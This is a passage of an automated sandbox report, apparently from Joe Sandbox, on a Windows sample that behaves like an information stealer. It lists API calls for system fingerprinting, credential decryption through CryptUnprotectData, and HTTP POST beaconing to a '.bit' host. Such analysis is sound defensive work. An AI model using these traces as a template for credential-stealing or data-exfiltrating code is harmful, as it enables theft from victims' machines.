                  • GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 00405784
                  • GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 00405796
                  • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 004057A8
                  • GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 004057BA
                  • GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 004057CC
                  • GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057DE
                  • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057F0
                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00405802
                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00405814
                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00405826
                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 00405838
                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040584A
                  • GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 0040585C
                  • GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 0040586E
                  • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405880
                  • GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405892
                  • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 004058A4
                  • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 004058B6
                  • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 004058C8
                  • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058DA
                  • LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058E9
                  • GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058F8
                  • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 0040590A
                  • GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 0040591C
                  • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0040592E
                  • GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405940
                  • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405952
                  • GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 00405964
                  • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 00405976
                  • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00405988
                  • GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 0040599A
                  • GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 004059AC
                  • GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 004059BE
                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004059D0
                  • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059E2
                  • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059F4
                  • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 00405A06
                  • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 00405A18
                  • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00405A2A
                  • LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 00405A39
                  • GetProcAddress.KERNEL32(75A50000,EnumDisplayDevicesW), ref: 00405A4E
                  • GetProcAddress.KERNEL32(75A50000,wvsprintfA), ref: 00405A63
                  • GetProcAddress.KERNEL32(75A50000,GetKeyboardLayoutList), ref: 00405A78
                  • LoadLibraryA.KERNEL32(shell32.dll,75A50000,GetKeyboardLayoutList,75A50000,wvsprintfA,75A50000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A87
                  • GetProcAddress.KERNEL32(75320000,ShellExecuteExW), ref: 00405A9C
                  • LoadLibraryA.KERNEL32(ntdll.dll,75320000,ShellExecuteExW,shell32.dll,75A50000,GetKeyboardLayoutList,75A50000,wvsprintfA,75A50000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405AAB
                  • GetProcAddress.KERNEL32(76E80000,RtlComputeCrc32), ref: 00405AC0
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
                  • API String ID: 2238633743-3531362093
                  • Opcode ID: dde84a1b0545234da602e85d90304d20f92d552cdb0d366e7dc8fbeb5297048c
                  • Instruction ID: b4e9e9acb65dceb8197331e62ecd6ac44c6462922570a5848b60e957845f71d1
                  • Opcode Fuzzy Hash: dde84a1b0545234da602e85d90304d20f92d552cdb0d366e7dc8fbeb5297048c
                  • Instruction Fuzzy Hash: 6EB15BB1A90710AFD700BFA5DC86A6A37A8FB4A704351593BB550FF2E5D6789C008F9C

                  Control-flow Graph

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000,00417C31,?,00000000,00000000,?,00418203,00000000,?,?,?), ref: 004178AC
                  • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00417C31,?,00000000,00000000,?,00418203,00000000,?,?,?), ref: 004178C0
                  • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004178D4
                  • GetProcAddress.KERNEL32(00000000,-00000017), ref: 004178EB
                  • GetProcAddress.KERNEL32(00000000,-00000025), ref: 00417902
                  • GetProcAddress.KERNEL32(00000000,-0000002C), ref: 00417919
                  • GetProcAddress.KERNEL32(00000000,-00000031), ref: 00417930
                  • GetProcAddress.KERNEL32(00000000,-00000036), ref: 00417947
                  • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041795E
                  • GetProcAddress.KERNEL32(00000000,-00000044), ref: 00417975
                  • WSAStartup.WS2_32(00000000,?), ref: 00417A08
                  • socket.WS2_32(00000002,00000001,00000000), ref: 00417A1C
                  • gethostbyname.WS2_32(00000000), ref: 00417A3F
                  • htons.WS2_32(00000000), ref: 00417A5F
                  • connect.WS2_32(00000000,00000002,00000010), ref: 00417A76
                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00417B46
                  • closesocket.WS2_32(00000000), ref: 00417BA5
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$HandleLibraryLoadModuleStartupclosesocketconnectgethostbynamehtonssendsocket
                  • String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
                  • API String ID: 4159890453-3355491746
                  • Opcode ID: b831acf75b33ce788b8c120819d800a9bb333e76fc7a647fd8acf93ac5003d10
                  • Instruction ID: 40f87eb91c0466ae62d4265024b0cddbd223269e9b4c2b0dfc8b3cbba4f3f7f6
                  • Opcode Fuzzy Hash: b831acf75b33ce788b8c120819d800a9bb333e76fc7a647fd8acf93ac5003d10
                  • Instruction Fuzzy Hash: 22B101B19042099BDB10EF65DC86ADFBBB8BB04309F10407BE505F22D1DB78AA458F98

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 604 417d84-417d88 605 417d8d-417d92 604->605 605->605 606 417d94-417dd3 call 403980 * 3 605->606 613 417de2-417e18 call 4034e4 call 40357c * 2 call 4039e8 GetModuleHandleA 606->613 614 417dd5-417ddd call 40357c 606->614 624 417e2a-41800f call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 4039e8 GetProcAddress call 404f5c * 7 call 403790 call 403990 InternetCrackUrlA call 4036dc call 403790 call 4039f0 call 403ad4 613->624 625 417e1a-417e28 call 4039e8 LoadLibraryA 613->625 614->613 672 418011-41804f call 4036dc call 4037dc call 417668 call 403990 624->672 673 418052-418066 InternetOpenA 624->673 625->624 672->673 674 4181b7-4181be 673->674 675 41806c-4180a9 InternetConnectA 673->675 681 4181c0-4181fe call 4036dc * 2 call 417820 674->681 682 418203-418210 call 4038dc 674->682 689 4181b1-4181b4 675->689 690 4180af-4180d6 call 4036dc call 403ad4 675->690 681->682 695 418212-418230 call 40627c call 4038dc 682->695 696 41823a-418291 call 403538 call 4034e4 call 403508 * 4 682->696 689->674 712 4180d8 690->712 713 4180df-418106 call 403990 HttpOpenRequestA 690->713 695->696 712->713 718 4181ab-4181af InternetCloseHandle 713->718 719 41810c-418110 713->719 718->689 721 418130-418152 call 403790 call 403990 HttpSendRequestA 719->721 722 418112-41812c call 403790 call 403990 719->722 721->718 737 418154-4181a3 call 404f5c call 4035d4 call 403798 721->737 722->721 737->718 745 4181a5-4181a9 737->745 745->718 745->737
                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E0F
                  • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E23
                  • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 00417E37
                  • GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00417E4C
                  • GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00417E61
                  • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00417E76
                  • GetProcAddress.KERNEL32(00000000,-00000053), ref: 00417E8B
                  • GetProcAddress.KERNEL32(00000000,-00000064), ref: 00417EA0
                  • GetProcAddress.KERNEL32(00000000,-00000075), ref: 00417EB5
                  • GetProcAddress.KERNEL32(00000000,-00000089), ref: 00417ECB
                  • GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00417EE2
                  • InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 00417FCE
                  • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041805F
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 0041809F
                  • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,?,?,00000000,00000000,00000000), ref: 004180FC
                  • HttpSendRequestA.WININET(00000000,004183CC,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041814D
                  • InternetCloseHandle.WININET(00000000,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 004181AF
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Internet$HandleHttpOpenRequest$CloseConnectCrackLibraryLoadModuleSend
                  • String ID: .bit$BF468D66$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
                  • API String ID: 4078552840-2667470685
                  • Opcode ID: 663d0bd0c9236ae1abf8be16e734511edf0ae365a5ce7ac882a09d6eb9fc6dbd
                  • Instruction ID: 5b133b9addfad1444578419e9148cb156d847e9dbbf5ea098b4cdfe065b0ee4c
                  • Opcode Fuzzy Hash: 663d0bd0c9236ae1abf8be16e734511edf0ae365a5ce7ac882a09d6eb9fc6dbd
                  • Instruction Fuzzy Hash: 01E10FB1900218ABDB10EFA5CC46FDEBBB8BF48305F10457AF504B7691DB78AA45CB58

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 746 406bd8-406c1e call 403c18 RegCreateKeyExW 749 406c20-406c43 RegQueryValueExW 746->749 750 406c62-406c69 746->750 751 406c55-406c60 RegCloseKey 749->751 752 406c45-406c50 call 403d6c 749->752 751->750 752->751
                  APIs
                    • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                  • RegCreateKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000000,00000000,00020019,00000000,?,00000000,?,00406D40,00000000,00406E52), ref: 00406C1A
                  • RegQueryValueExW.KERNELBASE(?,ProductName,00000000,00000000,?,?,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000), ref: 00406C3F
                  • RegCloseKey.KERNELBASE(00000000,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 00406C60
                  Strings
                  • ProductName, xrefs: 00406C2E
                  • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00406C09
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocCloseCreateQueryStringValue
                  • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                  • API String ID: 3260168215-1787575317
                  • Opcode ID: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
                  • Instruction ID: 11e12cba7479b8b01b9fafc70b7cecbc040d8651ce68523128cfa86d41fe4498
                  • Opcode Fuzzy Hash: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
                  • Instruction Fuzzy Hash: A4011E703843016BE310DA58CC81F4673E8EB48B04F104435B695EB2D0DAB4ED14975A

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 754 40a6aa-40a6b3 755 40a6b5-40a6ca LoadLibraryA GetProcAddress 754->755 756 40a6cf 754->756 755->756
                  APIs
                  • LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 0040A6BF
                  • GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 0040A6C5
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: CryptUnprotectData$crypt32.dll
                  • API String ID: 2574300362-1827663648
                  • Opcode ID: 6dc0792021c7f50060aa7ba59d25f2a2961755a6251dfcb882a20cdecde9314b
                  • Instruction ID: e6c421c79dddd478bde07d5489d503c1d4cc859a9cbe04b01679e24e10095fcf
                  • Opcode Fuzzy Hash: 6dc0792021c7f50060aa7ba59d25f2a2961755a6251dfcb882a20cdecde9314b
                  • Instruction Fuzzy Hash: 49C08CF06A030056CA01EBB29D4A70833693B82B887180C3BB040B14E0D93E4010970F

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 757 407d14-407d5e 759 407d60-407dac LookupAccountSidA CheckTokenMembership 757->759 760 407dd9-407ddf 757->760 761 407db5-407db8 759->761 762 407dae-407db3 759->762 763 407dbb-407dd1 FreeSid 761->763 762->763
                  APIs
                  • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407DD2), ref: 00407D95
                  • CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407DA8
                  • FreeSid.ADVAPI32(00000000,00407DD9), ref: 00407DCC
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AccountCheckFreeLookupMembershipToken
                  • String ID:
                  • API String ID: 1602037265-0
                  • Opcode ID: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
                  • Instruction ID: 27b9dc68911105edb543898119344a1168ea53adb1432c2ff39c990f87532faf
                  • Opcode Fuzzy Hash: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
                  • Instruction Fuzzy Hash: 0E21B575A04209AFDB41CBA8DC51BEFB7F8EB08700F104466EA14E7290E775AA008BA5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 765 404150-404154 766 404156-404166 SysAllocStringLen 765->766 767 40416e 765->767 768 403bac 766->768 769 40416c 766->769 768->765 769->767
                  APIs
                  • SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                  Strings
                  • SOFTWARE\Microsoft\Cryptography, xrefs: 0040415D
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocString
                  • String ID: SOFTWARE\Microsoft\Cryptography
                  • API String ID: 2525500382-1514646153
                  • Opcode ID: 76b0c5c92c78ac420becf6784fc6a1da342b91989b07b055a819ce3e10a128ad
                  • Instruction ID: b7488d83487bcecb75417ccbdbd58e5acfbbdb6a2dc67c9614fc1c7d46415314
                  • Opcode Fuzzy Hash: 76b0c5c92c78ac420becf6784fc6a1da342b91989b07b055a819ce3e10a128ad
                  • Instruction Fuzzy Hash: D2D012F42006025AD7488E29855593B776E5BD1700328867EA101AF2C4DB39E841DB38

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 770 4033f4-40340b 771 403423-40342a 770->771 772 40340d-403410 770->772 773 40342c-403438 call 4032dc call 403368 771->773 774 40343d-403441 771->774 772->771 775 403412-403421 772->775 773->774 777 403443-403446 774->777 778 40344d-403456 call 4031dc 774->778 775->771 777->778 781 403448-40344a 777->781 786 403458-40345b 778->786 787 40345d-403462 778->787 781->778 786->787 788 40347e-403487 call 4031b4 786->788 787->788 789 403464-403472 call 4048ec 787->789 795 403489 788->795 796 40348c-403490 788->796 789->788 794 403474-403476 789->794 794->788 797 403478-403479 FreeLibrary 794->797 795->796 798 403492 call 403338 796->798 799 403497-40349a 796->799 797->788 798->799 801 4034b3 799->801 802 40349c-4034a3 799->802 803 4034a5 802->803 804 4034ab-4034ae ExitProcess 802->804 803->804
                  APIs
                  • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
                  • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitFreeLibraryProcess
                  • String ID:
                  • API String ID: 1404682716-0
                  • Opcode ID: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
                  • Instruction ID: 3efb88752543cb7b7411b8850ba760202313331cae5217d67b69a3078a3e17bb
                  • Opcode Fuzzy Hash: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
                  • Instruction Fuzzy Hash: 772162709002408BDB229F6684847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 805 4033ec-40340b 807 403423-40342a 805->807 808 40340d-403410 805->808 809 40342c-403438 call 4032dc call 403368 807->809 810 40343d-403441 807->810 808->807 811 403412-403421 808->811 809->810 813 403443-403446 810->813 814 40344d-403456 call 4031dc 810->814 811->807 813->814 817 403448-40344a 813->817 822 403458-40345b 814->822 823 40345d-403462 814->823 817->814 822->823 824 40347e-403487 call 4031b4 822->824 823->824 825 403464-403472 call 4048ec 823->825 831 403489 824->831 832 40348c-403490 824->832 825->824 830 403474-403476 825->830 830->824 833 403478-403479 FreeLibrary 830->833 831->832 834 403492 call 403338 832->834 835 403497-40349a 832->835 833->824 834->835 837 4034b3 835->837 838 40349c-4034a3 835->838 839 4034a5 838->839 840 4034ab-4034ae ExitProcess 838->840 839->840
                  APIs
                  • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
                  • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitFreeLibraryProcess
                  • String ID:
                  • API String ID: 1404682716-0
                  • Opcode ID: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
                  • Instruction ID: a7f10c8a2f0efa7893578dab7d1fe92da90b98ef6ff2cf319ec6d8299990f2f9
                  • Opcode Fuzzy Hash: 712c545abaf320befb2a29c50df4fdabf10e6ed2be12c49fdfa7e8256cdbd3e8
                  • Instruction Fuzzy Hash: 922132709002408FDB229F6584847567FA9AF49316F1585BBE844AE2D6D77CCAC0C79D

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 841 4033f0-40340b 842 403423-40342a 841->842 843 40340d-403410 841->843 844 40342c-403438 call 4032dc call 403368 842->844 845 40343d-403441 842->845 843->842 846 403412-403421 843->846 844->845 848 403443-403446 845->848 849 40344d-403456 call 4031dc 845->849 846->842 848->849 852 403448-40344a 848->852 857 403458-40345b 849->857 858 40345d-403462 849->858 852->849 857->858 859 40347e-403487 call 4031b4 857->859 858->859 860 403464-403472 call 4048ec 858->860 866 403489 859->866 867 40348c-403490 859->867 860->859 865 403474-403476 860->865 865->859 868 403478-403479 FreeLibrary 865->868 866->867 869 403492 call 403338 867->869 870 403497-40349a 867->870 868->859 869->870 872 4034b3 870->872 873 40349c-4034a3 870->873 874 4034a5 873->874 875 4034ab-4034ae ExitProcess 873->875 874->875
                  APIs
                  • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
                  • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitFreeLibraryProcess
                  • String ID:
                  • API String ID: 1404682716-0
                  • Opcode ID: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
                  • Instruction ID: 9b75380a0c1bb1c5ffdc64597b03c40b9c34cb72d282d073c18e6e74c6ec6d76
                  • Opcode Fuzzy Hash: 1d3e21be2f222e88a5ce5129c4af818b1f382a2d1c87c05034a25e8df98eeb83
                  • Instruction Fuzzy Hash: F42141709002408BDB229F6684847567FA9AF49316F2585BBE844AE2C6D77CCAC0CB9D

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                  • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406EC8
                  • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF
                    • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: String$AllocFreeOpenQueryValue
                  • String ID:
                  • API String ID: 967375698-0
                  • Opcode ID: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
                  • Instruction ID: 95dba4e9abc9c412b13e6587c625634e660d61312d90d7235186b1c7fae4ad03
                  • Opcode Fuzzy Hash: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
                  • Instruction Fuzzy Hash: DB114970600209AFD700EF98D992ADEBBFCEF48704F4000B6B508E7291E774AB448BA5

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                  • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406EC8
                  • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF
                    • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: String$AllocFreeOpenQueryValue
                  • String ID:
                  • API String ID: 967375698-0
                  • Opcode ID: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
                  • Instruction ID: d6839de15ce0d986496e2f56cedbfcdd5c795bc72117923b9a37f873fbd9eab1
                  • Opcode Fuzzy Hash: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
                  • Instruction Fuzzy Hash: E0111971640209AFD700EB99DD86EDEBBFCEF48704F5000B6B508E7291DB74AB448A65

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 904 401388-401395 905 401397-40139c 904->905 906 40139e-4013a4 904->906 907 4013aa-4013c2 VirtualAlloc 905->907 906->907 908 4013c4-4013cb call 40123c 907->908 909 4013e7-4013ea 907->909 911 4013d0-4013d2 908->911 911->909 912 4013d4-4013e5 VirtualFree 911->912 912->909
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
                  Memory Dump Source
                  • Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                  • Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
                  • Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
